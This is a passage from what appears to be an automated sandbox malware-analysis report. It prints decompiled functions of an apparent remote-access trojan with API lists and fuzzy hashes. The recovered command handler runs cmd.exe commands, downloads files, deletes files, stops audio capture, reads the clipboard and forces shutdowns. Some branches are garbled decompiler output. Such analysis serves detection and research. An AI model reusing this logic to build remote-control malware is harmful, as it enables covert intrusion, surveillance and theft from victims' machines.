						StartServiceW(_t26, 0, 0);
						asm("sbb ebx, ebx");
						_t22 = 3;
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
					} else {
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
						_t22 = 2;
					}
				} else {
					CloseServiceHandle(_t27);
				}
				E00741EF0();
				return _t22;
			}

0x0075647d
0x0075648f
0x0075649e
0x007564a2
0x007564bc
0x007564ce
0x007564d3
0x007564d9
0x007564e2
0x007564f1
0x007564f6
0x007564f9
0x007564fc
0x007564be
0x007564c5
0x007564c8
0x007564ca
0x007564ca
0x007564a4
0x007564a5
0x007564a5
0x00756501
0x0075650e

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00755E19,00000000), ref: 00756481
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00755E19,00000000), ref: 00756498
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755E19,00000000), ref: 007564A5
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00755E19,00000000), ref: 007564B4
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755E19,00000000), ref: 007564C5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755E19,00000000), ref: 007564C8

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: d2e7c1f3d8a70cbfc4c55ad053db67afe9575c8f361b6dbef6acfffdf24e1861
Instruction ID: f3b5997eeba04f5b2010ecf829260b6a3347b1418cdf6f12d0d90b7cb35d1b9c
Opcode Fuzzy Hash: d2e7c1f3d8a70cbfc4c55ad053db67afe9575c8f361b6dbef6acfffdf24e1861
Instruction Fuzzy Hash: 75118231940118BB9610ABA89C89DFF7B7EDB467627408016FD0593150EB6C4E4BDAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00781BEE, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00781BEE(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x797208) {
					E007801F5(_t52);
					_t26 = _a4;
				}
				E007801F5( *((intOrPtr*)(_t26 + 0x3c)));
				E007801F5( *((intOrPtr*)(_a4 + 0x30)));
				E007801F5( *((intOrPtr*)(_a4 + 0x34)));
				E007801F5( *((intOrPtr*)(_a4 + 0x38)));
				E007801F5( *((intOrPtr*)(_a4 + 0x28)));
				E007801F5( *((intOrPtr*)(_a4 + 0x2c)));
				E007801F5( *((intOrPtr*)(_a4 + 0x40)));
				E007801F5( *((intOrPtr*)(_a4 + 0x44)));
				E007801F5( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00781AB4(5,  &_v8);
				_v8 =  &_a4;
				return E00781B04(4,  &_v8);
			}

0x00781bf4
0x00781bf7
0x00781bff
0x00781c02
0x00781c07
0x00781c0a
0x00781c0e
0x00781c19
0x00781c24
0x00781c2f
0x00781c3a
0x00781c45
0x00781c50
0x00781c5b
0x00781c69
0x00781c71
0x00781c7a
0x00781c82
0x00781c96

APIs

_free.LIBCMT ref: 00781C02

Part of subcall function 007801F5: HeapFree.KERNEL32(00000000,00000000,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?), ref: 0078020B
Part of subcall function 007801F5: GetLastError.KERNEL32(?,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?,?), ref: 0078021D

_free.LIBCMT ref: 00781C0E
_free.LIBCMT ref: 00781C19
_free.LIBCMT ref: 00781C24
_free.LIBCMT ref: 00781C2F
_free.LIBCMT ref: 00781C3A
_free.LIBCMT ref: 00781C45
_free.LIBCMT ref: 00781C50
_free.LIBCMT ref: 00781C5B
_free.LIBCMT ref: 00781C69

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f067e8bb6705fba5091477ec3c8bab34c4f64a7de453869e50501fa373c50e7b
Instruction ID: c10f34aa6db1a5c92c404ed4da808a0c416de8724042786e4bea3e0b72b991cb
Opcode Fuzzy Hash: f067e8bb6705fba5091477ec3c8bab34c4f64a7de453869e50501fa373c50e7b
Instruction Fuzzy Hash: B611937699014CFFCB41FF98CC4ACDD3BA9FF05360B4141A5BB088B222DA35DA549B80

Uniqueness

Uniqueness Score: -1.00%

Function 007523B9, Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 458
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E007523B9(void* __ebx, CHAR* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v116;
				char _v120;
				char _v140;
				char _v156;
				char _v164;
				void* _v172;
				char _v192;
				void* _v196;
				char _v212;
				char _v216;
				void* _v220;
				char _v240;
				void* _v244;
				char _v252;
				char _v264;
				void* _v268;
				void* _v284;
				char _v288;
				void* _v292;
				char _v304;
				char _v308;
				char _v312;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v364;
				char _v368;
				long _v372;
				int _v376;
				char _v396;
				char _v400;
				void* _v404;
				int _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v452;
				char _v500;
				char _v504;
				void* _t194;
				void* _t196;
				intOrPtr _t324;
				intOrPtr _t325;
				void* _t326;
				void* _t328;
				signed int _t329;
				signed int _t333;
				void* _t336;
				void* _t337;
				void* _t338;
				void* _t342;
				void* _t348;

				_t347 = __eflags;
				_t310 = __edx;
				_t244 = __ebx;
				_push(__ebx);
				_t324 = _a4;
				E007420EC(__ebx,  &_v308, __edx, __eflags, _t324 + 0x1c);
				SetEvent( *(_t324 + 0x34));
				_t325 =  *((intOrPtr*)(E00741F95( &_v312)));
				E007442A6( &_v312,  &_v288, 4, 0xffffffff);
				_t336 = (_t333 & 0xfffffff8) - 0x18c;
				E007420EC(__ebx, _t336, _t310, _t347, 0x7ac238);
				_t337 = _t336 - 0x18;
				E007420EC(__ebx, _t337, _t310, _t347,  &_v304);
				E00757478( &_v444, _t310);
				_t338 = _t337 + 0x30;
				_t348 = _t325 - 0x8f;
				if(_t348 > 0) {
					_t326 = _t325 + 0xffffff70;
					__eflags = _t326 - 0x22;
					if(__eflags <= 0) {
						switch( *((intOrPtr*)(( *(_t326 + 0x753511) & 0x000000ff) * 4 +  &M007534C5))) {
							case 0:
								__ecx =  &_v420;
								__ecx = E00741E49( &_v420, __edx, __eflags, 0);
								__eax = E00741F95(__ecx);
								__ecx = __eax;
								__eax = E00747F83(__ecx);
								goto L126;
							case 1:
								__ecx =  &_v420;
								__ecx = E00741E49( &_v420, __edx, __eflags, 0);
								__eax = E00741F95(__eax);
								__eax = StrToIntA(__eax);
								__ecx =  &_v424;
								__edi = __eax;
								__ecx = E00741E49( &_v424, __edx, __eflags, 1);
								__eax = E00741F95(__eax);
								__dl = 0x30;
								__ecx =  &_v408;
								__eax = E0075805B( &_v408, __edx, __eax);
								__ecx =  &_v408;
								__eax = E00741EEB( &_v408);
								__ecx =  &_v428;
								__esi = __eax;
								__eax = E00741E49( &_v428, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx = __esi;
								__eax = E00757A4E(__esi);
								__esp = __esp + 0x18;
								__ecx =  &_v416;
								__edx = E00741EEB( &_v416);
								__ecx = __edi;
								__eax = E00757F10(__edi, __edx);
								goto L106;
							case 2:
								__ecx =  &_v420;
								__ecx = E00741E49( &_v420, __edx, __eflags, 1);
								__eax = E00741F95(__eax);
								__ecx =  &_v424;
								__ecx = E00741E49( &_v424, __edx, __eflags, 0);
								__eax = E00741F95(__ecx);
								__eax = SetWindowTextW(__eax, __eax);
								goto L20;
							case 3:
								__ecx =  &_v420;
								__eax = E00741E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00753545(__ebx, __edx);
								goto L103;
							case 4:
								__ecx =  &_v420;
								__eax = E00741E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00753673(__ecx, __eflags);
								goto L103;
							case 5:
								E007420EC(__ebx, _t338 - 0x18, _t310, __eflags, E00741E49( &_v420, _t310, __eflags, 0));
								E0074691F(_t310);
								goto L103;
							case 6:
								__ecx =  &_v420;
								__eax = E00741E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00755397(__edx);
								goto L103;
							case 7:
								__ecx =  &_v420;
								__eax = E00741E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00744013(__edx);
								goto L103;
							case 8:
								__eax = E0075667F(__ebx);
								goto L126;
							case 9:
								__eax = E007567AD(__ebx, __eflags);
								goto L126;
							case 0xa:
								__eax = E007567EA(__eax);
								goto L126;
							case 0xb:
								__ebx = 0;
								__ecx =  &_v420;
								__ecx = E00741E49( &_v420, __edx, __eflags, 0);
								__eax = E00745220(0);
								__ecx =  &_v428;
								__eflags =  *__eax - __bl;
								__ebx = 0 | __eflags != 0x00000000;
								__eax = E00741E49( &_v428, __edx, __eflags, 1);
								__dl = __bl;
								__ecx = __eax;
								__eax = E0075678C(__ecx, __edx, __edi, __esi);
								goto L126;
							case 0xc:
								__eax = E007567F2(__edx);
								goto L126;
							case 0xd:
								__eax = E00745F77(__ebx, __ecx, __edx);
								__ecx =  &_v420;
								__esi = __eax;
								__eax = E00741E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx =  &_v340;
								__edi = __esp;
								__edx = __esi;
								__edx = E00757226(__ebx,  &_v340, __esi);
								__ecx =  &_v372;
								__edx = __eax;
								__ecx = __edi;
								__eax = E00742F93(__ebx, __edi, __edx, __eflags, __eax);
								_push(0xab);
								goto L125;
							case 0xe:
								__eflags =  *0x7abb03;
								if( *0x7abb03 != 0) {
									ShowWindow( *0x7abebc, 9) = SetForegroundWindow( *0x7abebc);
								} else {
									__cl = 1;
									__eax = E00758F59(__ebx, __ecx, __edx);
									__ebx = 0;
									__eax = CreateThread(0, 0, E00758D28, 0, 0, 0);
									 *0x7abb03 = 2;
								}
								goto L126;
							case 0xf:
								_push(5);
								goto L16;
							case 0x10:
								__ebx = 0;
								_push(0);
								_push(0);
								goto L17;
							case 0x11:
								__ecx =  &_v116;
								__eax = E007472F6( &_v116);
								__ecx =  &_v420;
								__eax = E00741E49( &_v420, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v428;
								__eax = E00741E49( &_v428, __edx, __eflags, 1);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v436;
								__eax = E00741E49( &_v436, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v140;
								__eax = E00745BD3( &_v140, __edx);
								__ecx =  &_v212;
								__eax = L00747304(__ebx, __ecx, __esi);
								goto L126;
							case 0x12:
								goto L126;
						}
					}
					goto L126;
				} else {
					if(_t348 == 0) {
						E00753534( &_v116);
						_v348 = E00776769(_t187, E00741F95(E00741E49( &_v420, _t310, __eflags, 2)));
						_v344 =  &_v120;
						E007539B3(__ebx, _t310, 0x7ac238, __eflags,  &_v348);
						_t120 = E0074805A() - 1; // -1
						_t328 = _t120;
						_t194 = E00741E49( &_v428, _t310, __eflags, 3);
						_t342 = _t338 - 0x18;
						E007420EC(_t244, _t342, _t310, __eflags, _t194);
						_t196 = E00741E49( &_v436, _t310, __eflags, 2);
						E007420EC(_t244, _t342 - 0x18, _t310, __eflags, _t196);
						E0074427F(_t244, _t342, E00741F95(E00741E49( &_v444, _t310, __eflags, 1)));
						E0074427F(_t244, _t342 - 0xffffffffffffffe8, E00741F95(E00741E49( &_v452, _t310, __eflags, 0)));
						E007477EC( &_v156, _t310, __eflags);
						__eflags = _v252;
						if(_v252 == 0) {
							E00748007( &_v420,  *((intOrPtr*)(E00747FE6(E0074806E( &_v156,  &_v504),  &_v500, _t328))));
						}
						E00747FDE(_t244,  &_v212, _t328);
						goto L126;
					} else {
						_t329 = _t325 - 1;
						if(_t329 > 0x33) {
							L126:
							_t163 =  &_v420; // 0x744538
							E00741E74(_t163, _t310);
							E00741FC7();
							E00741FC7();
							return 0;
						} else {
							switch( *((intOrPtr*)(_t329 * 4 +  &M007533F5))) {
								case 0:
									_t213 = E00757226(0,  &_v368, GetTickCount());
									_t215 = E00757226(0,  &_v336, E007571D6( &_v368));
									_t217 = E0075739C(0,  &_v164, E0075719C( &_v140));
									_t319 = E00742F93(0,  &_v404, E00742F1D( &_v264, E00742F93(0,  &_v240, E00742F1D( &_v216, E00742FB7( &_v192, E00741E49( &_v420, _t216, _t349, 0), 0x7ac238), _t217), _t349, 0x7ac238), _t215), _t349, 0x7ac238);
									E00742F1D(_t338 - 0x18, _t223, _t213);
									_push(0x4c);
									E00744AA4(0, 0x7ac780, _t223, _t349);
									E00741FC7();
									E00741FC7();
									E00741FC7();
									E00741FC7();
									E00741FC7();
									E00741FC7();
									E00741EF0();
									E00741FC7();
									E00741FC7();
									_t237 = E00776769(_t235, E00741F95(E00741E49( &_v452, _t223, _t349, 1)));
									if(_t237 == 0) {
										E00741E49( &_v440, _t319, __eflags, 0);
										_t310 = "0";
										_t239 = E00745A6F("0");
										__eflags = _t239;
										if(_t239 != 0) {
											_push(0);
											_t308 = 0x7ac780;
											goto L10;
										}
									} else {
										_t310 = _t237 + _t237;
										if(E0074484A(0x7ac780) == 0) {
											E00744E9A(0x7ac780, _t310, 1);
										} else {
											E00744FAD(0x7ac238, _t310);
										}
									}
									goto L126;
								case 1:
									_push(0);
									__ecx = 0x7ac780;
									L10:
									E0074511B(_t308, 0x7ac238);
									goto L126;
								case 2:
									__ecx =  &_v368;
									__eax = E00757C05(__ebx,  &_v368);
									__esp = __esp - 0x18;
									__edx = __eax;
									__ecx = __esp;
									__eax = E0075739C(__ebx, __esp, __edx);
									_push(0x33);
									__ecx = 0x7ac780;
									__eax = E00744AA4(__ebx, 0x7ac780, __edx, __eflags);
									__ecx =  &_v396;
									goto L107;
								case 3:
									goto L126;
								case 4:
									 &_v376 = GetCurrentProcessId();
									__eax = E0077BACE(__ecx, __eax,  &_v376, 0xa);
									__esp = __esp - 0xc;
									__eax =  &_v376;
									__esi = __esp;
									__ecx =  &_v336;
									__edx = E0074D211(__ebx,  &_v336, __eflags);
									__ecx =  &_v368;
									__edx = __eax;
									__ecx = __esi;
									__eax = E00745343(__ebx, __esi, __edx, __edi, __eflags,  &_v376);
									_push(0x4f);
									L125:
									__ecx = 0x7ac780;
									__eax = E00744AA4(__ebx, 0x7ac780, __edx, __eflags);
									__ecx =  &_v396;
									__eax = E00741FC7();
									__ecx =  &_v364;
									__eax = E00741FC7();
									goto L126;
								case 5:
									__ecx =  &_v420;
									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
									__eax = E00741F95(__ecx);
									__ecx = __eax;
									__eax = E007571F9(__ecx);
									goto L126;
								case 6:
									L20:
									__eax = E00753909(__edx);
									goto L126;
								case 7:
									__ecx =  &_v420;
									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
									__eax = E00741F95(__ecx);
									__eax = CloseWindow(__eax);
									goto L126;
								case 8:
									_push(3);
									goto L16;
								case 9:
									_push(9);
									L16:
									_push(0);
									L17:
									__ecx =  &_v420;
									__ecx = E00741E49( &_v420, __edx, __eflags);
									__eax = E00741F95(__ecx);
									__eax = ShowWindow(__eax, ??);
									goto L126;
								case 0xa:
									__eax =  &_v372;
									__ecx =  &_v420;
									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
									__eax = E00741F95(__ecx);
									__eax = GetWindowThreadProcessId(__eax,  &_v372);
									__ecx = _v376;
									__eax = E007571F9(_v376);
									goto L20;
								case 0xb:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
									__eax = E00741F95(__eax);
									__ecx =  &_v340;
									__eax = E0074427F(0,  &_v340, __eax);
									__edx = L"/C ";
									__ecx =  &_v376;
									__ecx = __eax;
									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
									__ecx =  &_v376;
									__eax = E00741EF0();
									__ecx =  &_v344;
									goto L107;
								case 0xc:
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 1);
									__ecx = 0x7ac2d0;
									__eax = E00741FAD(0x7ac2d0, __eax);
									__eflags =  *0x7abae3 - __bl;
									if(__eflags == 0) {
										__ecx =  &_v420;
										__eax = E00741E49( &_v420, __edx, __eflags, 0);
										__esp = __esp - 0x18;
										__ecx = __esp;
										__eax = E007455EA();
										goto L103;
									}
									goto L126;
								case 0xd:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
									E00741F95(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
									goto L126;
								case 0xe:
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 0);
									__ecx = 0x7ac868;
									__eax = E00741FAD(0x7ac868, __eax);
									__ecx =  &_v428;
									__ecx = E00741E49( &_v428, __edx, __eflags, 3);
									__eax = E00741F95(__ecx);
									__esi = __eax;
									__eax = E0075451F(__edx, __edi, __eax);
									__ecx =  &_v432;
									__ecx = E00741E49( &_v432, __edx, __eflags, 2);
									__eax = E00741F95(__ecx);
									__eax = E00776769(__ecx, __eax);
									__eflags = __eax;
									__ecx =  &_v436;
									_t57 = __eax != 0;
									__eflags = _t57;
									__ebx = 0 | _t57;
									__ecx = E00741E49( &_v436, __edx, _t57, 1);
									E00741F95(__ecx) = E00776769(__ecx, __eax);
									__dl = __bl;
									__cl = __al;
									__eax = E0075459C(__ecx, __edx, __eflags, __esi);
									goto L26;
								case 0xf:
									 *0x7abd6a = 1;
									__eax = __eax + 0x7abd6a;
									__ecx = __ebp + __ecx;
									asm("wait");
									__eax = __eax |  *__eax;
									 *__edx =  *__edx + __ch;
									__eflags =  *__edx;
									goto L126;
								case 0x10:
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x7ac350;
									__eax = E0074857D(0x7ac350, __edx);
									goto L126;
								case 0x11:
									__ecx = 0x7ac350;
									__eax = E007493AD(0x7ac350);
									goto L126;
								case 0x12:
									__ecx = 0x7ac350;
									__eax = E0074951E(__ebx, 0x7ac350);
									goto L126;
								case 0x13:
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 0);
									__ecx = 0x7ac3e0;
									__eax = E00741FAD(0x7ac3e0, __eax);
									__ecx = 0x7ac350;
									goto L33;
								case 0x14:
									 *0x7abd6c =  *0x7abd6c + 1;
									__eflags =  *0x7abd6c;
									__eflags = __eax;
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x7ac350;
									__eax = E00748FF0(0x7ac350, __edx);
									goto L36;
								case 0x15:
									__esi = 0x7ac350;
									__ecx = 0x7ac350;
									__eax = E00749D36(0x7ac350);
									__ecx = 0x7ac350;
									L33:
									__eax = E00748E9E(__ebx, __ecx);
									goto L126;
								case 0x16:
									__eflags =  *0x7abaf9 - __bl;
									asm("sbb eax, 0x7abaf9");
									if(__eflags == 0) {
										__edx = 0;
										__cl = 0;
										__eax = E0074A679(0);
									}
									goto L126;
								case 0x17:
									__ebx = 0;
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 0);
									__ecx = 0x7ac1b8;
									__eax = E00741FAD(0x7ac1b8, __eax);
									__ecx = 0x7ac1d0;
									__eax = E0074498B(0x7ac1d0);
									__esp = __esp - 0x10;
									__esi = 0x7abacc;
									__edi = __esp;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi = 0x7ac1d0;
									__ecx = 0x7ac1d0;
									__eax = E00744A08(__edx);
									__esp = __esp - 0x18;
									__ecx = __esp;
									_push(0x7ac1b8);
									__eflags =  *0x7abaaa - __bl; // 0x0
									if(__eflags == 0) {
										__eax = E007420EC(0, __ecx, __edx, __eflags);
									} else {
										__eax = E007420EC(0, __ecx, __edx, __eflags);
									}
									__ecx = __esi;
									__eax = E00744AA4(__ebx, __esi, __edx, __eflags);
									__ecx = __esi;
									__eax = E00744BBE(__ecx, __edx, 0x744538, __ebx);
									goto L126;
								case 0x18:
									__eax =  *0x7abac0();
									__ecx = 0x7ac1d0;
									__eax = E00744E0B(0x7ac1d0);
									goto L126;
								case 0x19:
									__ebx = 0;
									__ecx =  &_v420;
									 *0x7aba74 = __bl;
									__eax = E00741E49( &_v420, __edx, __eflags, 3);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E007420EC(0, __esp, __edx, __eflags, __eax);
									__ecx =  &_v428;
									__ecx = E00741E49( &_v428, __edx, __eflags, 2);
									__eax = E00741F95(__ecx);
									_push(__eax);
									__ecx =  &_v432;
									__ecx = E00741E49( &_v432, __edx, __eflags, 1);
									__eax = E00741F95(__ecx);
									__eax = E00776769(__ecx, __eax);
									__ecx =  &_v436;
									__esi = __eax;
									__ecx = E00741E49( &_v436, __edx, __eflags, 0);
									__eax = E00741F95(__ecx);
									__eax = E00776769(__ecx, __eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = E007416F8(__ecx, __edx, __edi, __esi);
									goto L126;
								case 0x1a:
									_push( *0x7abab8);
									__eax = __eax ^ 0x007abab8;
									 *0x7aba74 = 1;
									waveInStop(??) = waveInClose( *0x7abab8);
									goto L126;
								case 0x1b:
									 *0x7abd6c =  *0x7abd6c + 1;
									__eflags =  *0x7abd6c;
									__eax = 0x7abd6c + __eax;
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 1);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx =  &_v428;
									__eax = E00741E49( &_v428, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00750188(__edx);
									__esp = __esp + 0x30;
									L36:
									 *0x7abd6c =  *0x7abd6c - 1;
									goto L126;
								case 0x1c:
									__ecx =  &_v420;
									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
									E00741F95(__ecx) = DeleteFileW(__eax);
									goto L126;
								case 0x1d:
									__eax = E0075015B();
									ExitProcess(0);
								case 0x1e:
									while(1) {
										__eflags =  *0x7abd6c - __ebx;
										if( *0x7abd6c == __ebx) {
											break;
										}
										Sleep(0x64);
									}
									__al = __al + __ch;
									__eflags = __al;
									E0074AD84();
									_pop(__ebx);
									__al = __al & 0x00000075;
									__cl = __cl + __ah;
									__eax = __eax & 0x2f500075;
									__eflags = __eax;
									if (__eflags != 0) goto L128;
									asm("les esi, [ebx]");
									if (__eflags != 0) goto L129;
									asm("les esi, [ebx]");
									if (__eflags != 0) goto L130;
									goto 0x7526;
									__eflags = __cl;
									if (__eflags != 0) goto L131;
									_push(__ebx);
									if (__eflags != 0) goto L132;
									if(__eflags >= 0) {
										if (__eflags != 0) goto L134;
										asm("lahf");
										if (__eflags != 0) goto L135;
										 *0xdb007526 = __eax;
										if (__eflags != 0) goto L136;
										__eax = __eax ^ 0x77007527;
										__eflags = __eax;
										asm("daa");
										if (__eax != 0) goto L137;
										__al =  *0x1d007527;
										 *__ebp =  *__ebp - __dh;
										 *__eax =  *__eax - __ebp;
										__eflags =  *__eax;
										if ( *__eax != 0) goto L138;
										__esi = __esi - 1;
										 *__ebp =  *__ebp - __dh;
										__eflags =  *__ebp;
									}
									 *__ebp =  *__ebp - __dh;
									asm("insb");
									 *__ebp =  *__ebp - __dh;
									_t166 = __eax;
									__eax = __ecx;
									__ecx = _t166;
									 *__ebp =  *__ebp - __dh;
									__eflags =  *__ebp;
									return __eax;
									goto L140;
								case 0x1f:
									__eax = E0074B488(__ebx, __eflags);
									goto L126;
								case 0x20:
									while(1) {
										__eflags =  *0x7abd6c - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
									__eax = E00741F95(__eax);
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = E00741E49( &_v424, __edx, __eflags, 1);
									__eax = E00741F95(__eax);
									__dl =  *__esi;
									__ecx =  &_v408;
									__eax = E0075805B( &_v408, __edx, __eax);
									_push(0);
									_push(0);
									__ecx =  &_v408;
									_push(E00741EEB( &_v408));
									__ecx =  &_v428;
									__ecx = E00741E49( &_v428, __edx, __eflags, 2);
									__eax = E00741F95(__eax);
									_push(__eax);
									_push(0);
									__imp__URLDownloadToFileW();
									__eflags = __eax;
									if(__eflags == 0) {
										goto L58;
									}
									goto L106;
								case 0x21:
									while(1) {
										__eflags =  *0x7abd6c - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ecx =  &_v420;
									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
									__eax = E00741F95(__eax);
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = E00741E49( &_v424, __edx, __eflags, 1);
									__eax = E00741F95(__eax);
									__dl =  *__esi;
									__ecx =  &_v408;
									__eax = E0075805B( &_v408, __edx, __eax);
									__ecx =  &_v408;
									__eax = E00741EEB( &_v408);
									__ecx =  &_v428;
									__esi = __eax;
									__eax = E00741E49( &_v428, __edx, __eflags, 2);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = __esi;
									__eax = E00757A4E(__esi);
									__esp = __esp + 0x18;
									__eflags = __al;
									if(__eflags != 0) {
										L58:
										__esp = __esp - 0x18;
										__eax =  &_v420;
										__ecx = __esp;
										E00747350(__ebx, __esp, __edx, __eflags,  &_v420) = E0074B0E2();
										__esp = __esp + 0x18;
									}
									goto L106;
								case 0x22:
									__ecx =  &_v420;
									__ecx = E00741E49( &_v420, __edx, __eflags, 2);
									__eax = E00741F95(__ecx);
									__eax = __eax + 0x10000;
									__ecx =  &_v424;
									__ecx = E00741E49( &_v424, __edx, __eflags, 1);
									__eax = E00741F95(__eax);
									__ebx = 0;
									__ecx =  &_v428;
									__ecx = E00741E49( &_v428, __edx, __eflags, 0);
									E00741F95(__ecx) = MessageBoxW(0, __eax, __eax, __eax);
									goto L126;
								case 0x23:
									__eax = E00753958();
									__ebx = 0;
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 0);
									__edx = "0";
									__ecx = __eax;
									__eax = E00745A6F(__edx);
									__ecx =  &_v424;
									_push(0);
									__eflags = __al;
									if(__eflags == 0) {
										__eax = E00741E49( &_v424, __edx, __eflags);
										__edx = "1";
										__ecx = __eax;
										__eax = E00745A6F(__edx);
										__ecx =  &_v424;
										_push(0);
										__eflags = __al;
										if(__eflags == 0) {
											__eax = E00741E49( &_v424, __edx, __eflags);
											__edx = "2";
											__ecx = __eax;
											__eax = E00745A6F(__edx);
											__eflags = __al;
											if(__eflags == 0) {
												__eax = LoadLibraryA("PowrProf.dll");
												__eax = GetProcAddress(__eax, "SetSuspendState");
												__ecx =  &_v420;
												__esi = __eax;
												__eax = E00741E49( &_v420, __edx, __eflags, 0);
												__edx = "3";
												__ecx = __eax;
												__eax = E00745A6F(__edx);
												_push(0);
												__eflags = __al;
												if(__eflags == 0) {
													__ecx =  &_v420;
													__eax = E00741E49( &_v420, __edx, __eflags);
													__edx = "4";
													__ecx = __eax;
													__eax = E00745A6F(__edx);
													__eflags = __al;
													if(__al != 0) {
														_push(0);
														_push(0);
														_push(1);
														goto L75;
													}
												} else {
													_push(0);
													_push(0);
													L75:
													__eax =  *__esi();
												}
											} else {
												_push(0);
												__ecx =  &_v420;
												__ecx = E00741E49( &_v420, __edx, __eflags, 1);
												__eax = E00741F95(__ecx);
												__eax = E00776769(__ecx, __eax);
												__eax = __eax | 0x00000002;
												__eflags = __eax;
												goto L70;
											}
										} else {
											__ecx = E00741E49( &_v424, __edx, __eflags, 1);
											__eax = E00741F95(__ecx);
											__eax = E00776769(__ecx, __eax);
											__eax = __eax | 0x00000001;
											goto L70;
										}
									} else {
										__ecx = E00741E49( &_v424, __edx, __eflags, 1);
										__eax = E00741F95(__ecx);
										__eax = E00776769(__ecx, __eax);
										L70:
										_pop(__ecx);
										__eax = ExitWindowsEx(__eax, ??);
									}
									goto L126;
								case 0x24:
									L81:
									__eax = OpenClipboard(__ebx);
									__eflags = __eax;
									if(__eax != 0) {
										__esi = GetClipboardData(0xd);
										__edi = GlobalLock(__esi);
										GlobalUnlock(__esi) = CloseClipboard();
										__eflags = __edi;
										0x79f724 =  !=  ? __edi : 0x79f724;
